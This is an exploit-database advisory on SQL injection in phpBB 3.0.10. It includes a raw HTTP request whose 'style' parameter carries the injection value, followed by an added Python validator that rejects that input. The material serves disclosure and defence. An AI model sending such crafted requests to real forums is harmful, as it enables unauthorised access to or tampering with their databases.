phpBB – Multiple SQL Injections

  • Author: HauntIT
    Date: 2012-07-28
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/37551/
  • source: https://www.securityfocus.com/bid/54734/info
    
    phpBB is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
    
    A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
    
    phpBB 3.0.10 is vulnerable; other versions may also be affected. 
    
    Request:
    
    ---
    POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip, deflate
    Proxy-Connection: keep-alive
    Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174
    Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 258
    Connection: close
    
    viewemail=1
    &massemail=1
    &allowpm=1
    &hideonline=0
    &notifypm=1
    &popuppm=0
    &lang=en
    &style=%2b1111111111
    &tz=0
    &dst=0
    &dateoptions=D+M+d%2C+Y+g%3Ai+a
    &dateformat=D+M+d%2C+Y+g%3Ai+a
    &submit=Submit
    &creation_time=1343370877
    &form_token=576...
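
A server-side input check for the preferences form, as an added example (not phpBB's code and not part of the original advisory): it parses the form body and rejects integer fields whose decoded value is not a plain unsigned integer in range, which flags the `style` value in the request above. The field list, the bounds and the name `check_prefs_body` are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

# Assumed schema (not from the page): preference fields that should carry
# plain unsigned integers, with inclusive bounds chosen for illustration.
INT_FIELDS = {
    "style": (1, 16_777_215),
    "viewemail": (0, 1),
    "massemail": (0, 1),
    "allowpm": (0, 1),
    "hideonline": (0, 1),
    "notifypm": (0, 1),
    "popuppm": (0, 1),
    "dst": (0, 1),
}
# ASCII digits only: no sign, whitespace, hex prefix or Unicode digits.
STRICT_UINT = re.compile(r"[0-9]{1,10}")


def check_prefs_body(body: str) -> list[tuple[str, str, str]]:
    """Return (field, decoded value, reason) for each integer field that fails."""
    findings = []
    seen = set()
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name not in INT_FIELDS:
            continue
        if name in seen:  # repeated parameters can bypass a check on the first copy
            findings.append((name, value, "duplicate parameter"))
            continue
        seen.add(name)
        low, high = INT_FIELDS[name]
        if not STRICT_UINT.fullmatch(value):
            findings.append((name, value, "not a plain unsigned integer"))
        elif not low <= int(value) <= high:
            findings.append((name, value, "out of range"))
    return findings


# Constructed sample: the body of the request shown above joined onto one line;
# the form_token is truncated on the page, so a placeholder stands in for it.
SAMPLE_BODY = (
    "viewemail=1&massemail=1&allowpm=1&hideonline=0&notifypm=1&popuppm=0"
    "&lang=en&style=%2b1111111111&tz=0&dst=0"
    "&dateoptions=D+M+d%2C+Y+g%3Ai+a&dateformat=D+M+d%2C+Y+g%3Ai+a"
    "&submit=Submit&creation_time=1343370877&form_token=PLACEHOLDER"
)

if __name__ == "__main__":
    for field, value, reason in check_prefs_body(SAMPLE_BODY):
        print(f"{field}={value!r}: {reason}")
```

The strict pattern matters because a lenient cast such as Python's `int()` accepts the leading `+` and would let the value through; validation like this complements parameterized queries in the handler rather than replacing them.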